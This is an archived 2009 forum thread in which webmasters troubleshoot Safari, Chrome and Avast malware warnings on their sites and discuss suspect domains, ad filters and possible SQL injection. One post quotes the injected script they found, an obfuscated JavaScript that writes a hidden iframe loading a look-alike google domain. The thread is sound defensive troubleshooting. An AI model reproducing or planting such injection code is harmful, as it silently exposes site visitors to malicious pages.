Suspected Malware attempt when using Safari

Have a suggestion for the site and/or board? Post it here!

Moderators: chamber715, joerules

Postby joerules » Mon May 25, 2009 4:23 pm

This is good. I've added both openstat.ws and trafing.net to the Competitive Ad Filter. they say it could take a couple hours to kick in. Hopefully it's nothing more serious. :(

Thanks for the help though. :)
User avatar
joerules
 
Posts: 19126
Joined: Tue Nov 19, 2002 12:43 am
Location: NYC

Postby logosmonkey » Mon May 25, 2009 6:18 pm

You might also want to ad google-adservice.com, it's another one mentioned in the forums referenced off that last link. I don't think it's one affecting you but it wouldn't hurt.
User avatar
logosmonkey
 
Posts: 1904
Joined: Sat Feb 17, 2007 11:17 pm
Location: Arkansas

Postby chamber715 » Mon May 25, 2009 9:33 pm

Is anyone still having trouble with the site? I was able to find a piece of code that was causing the problem. I just don't know if I got all of it. If you guys are still seeing the warnings, let me know and I'll do another search.
If you're stupid, surround yourself with smart people. If you're smart, surround yourself with smart people who disagree with you.
chamber715
 
Posts: 12498
Joined: Thu Nov 14, 2002 1:20 pm

Postby Silv3r » Mon May 25, 2009 9:54 pm

I got another warning when I came to the site about 10 minutes ago. If it happens again I'll write down the details and post them up.
If you're looking in a signature for some astonishing insight into the way things are, keep on lookin'.
User avatar
Silv3r
 
Posts: 1347
Joined: Tue Sep 19, 2006 4:45 am
Location: Australia

Postby Liliplanet » Tue May 26, 2009 4:40 am

Hi, yes I still have the problem. What I've done is to disable javascript on my site, and that seems to work.

Please, what is the code you found that is causing this? Is it Googe Adsense?

Thank you for your reply.
Liliplanet
 
Posts: 3
Joined: Mon May 25, 2009 6:22 am

Postby joerules » Tue May 26, 2009 5:35 pm

I got it once on the board just now. (5:35 pm)
User avatar
joerules
 
Posts: 19126
Joined: Tue Nov 19, 2002 12:43 am
Location: NYC

Postby Silv3r » Wed May 27, 2009 3:41 am

Just got it again through Chrome, both it and Avast notified me this time, whereas previously its just been avast.

Says its linking to malicious site openstat.ws
If you're looking in a signature for some astonishing insight into the way things are, keep on lookin'.
User avatar
Silv3r
 
Posts: 1347
Joined: Tue Sep 19, 2006 4:45 am
Location: Australia

Postby Liliplanet » Wed May 27, 2009 6:36 am

Yes, I have it again as well. After removing any javascript on my site. Do you think it's only related to adsense?

This is the code that gets inserted:

script type="text/javascript">
function advQuery(){
var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();
script
Liliplanet
 
Posts: 3
Joined: Mon May 25, 2009 6:22 am

Postby afr0puff » Wed Jun 10, 2009 5:10 pm

It's back... go00ogle.net.
ImageBored at work? Need to kill time? CLICK HERE!Image
User avatar
afr0puff
 
Posts: 7538
Joined: Wed Dec 04, 2002 10:52 am

Postby joerules » Wed Jun 10, 2009 8:56 pm

I added that for the front page. where are you seeing it? which page?
User avatar
joerules
 
Posts: 19126
Joined: Tue Nov 19, 2002 12:43 am
Location: NYC

Postby Tom Brazelton » Wed Jun 10, 2009 10:24 pm

I've been having the exact same problem over the last few days. Me and my site admin combed the site for code and couldn't find anything.

We're thinking it has to be one of the ads that's causing it, but can't figure out which one.
[url=http://tinyurl.com/6nao3v]THEATER HOPPER -::- Comics about movies.
[/url]
User avatar
Tom Brazelton
 
Posts: 5358
Joined: Sun Nov 13, 2005 1:03 pm
Location: West Des Moines, Iowa

Postby afr0puff » Wed Jun 10, 2009 11:28 pm

On the forum.
ImageBored at work? Need to kill time? CLICK HERE!Image
User avatar
afr0puff
 
Posts: 7538
Joined: Wed Dec 04, 2002 10:52 am

Postby logosmonkey » Thu Jun 11, 2009 8:53 am

If it's happening on the boards it could feasibly be a SQL injection attack. Especially if you end up finding the code on your pages later. See http://www.governmentsecurity.org/forum ... topic=4209 or http://www.google.com/search?q=phpbb+sq ... =firefox-a
2.0.8 and earlier version are susceptible to different types.

But I still think it's something to do with your ads because I never see them, but I adblock all your ads (sorry!)
User avatar
logosmonkey
 
Posts: 1904
Joined: Sat Feb 17, 2007 11:17 pm
Location: Arkansas

Postby joerules » Thu Jun 11, 2009 7:51 pm

There are no ads on the boards... :(
User avatar
joerules
 
Posts: 19126
Joined: Tue Nov 19, 2002 12:43 am
Location: NYC

Postby Tom Brazelton » Thu Jun 11, 2009 11:13 pm

I don't think it matters.

If Safari or Chrome has identified the URL as dangerous, anything that comes after ".com/" is suspect.
[url=http://tinyurl.com/6nao3v]THEATER HOPPER -::- Comics about movies.
[/url]
User avatar
Tom Brazelton
 
Posts: 5358
Joined: Sun Nov 13, 2005 1:03 pm
Location: West Des Moines, Iowa

PreviousNext

Return to Site Suggestions Board

Who is online

Users browsing this forum: bvvddffg and 0 guests

cron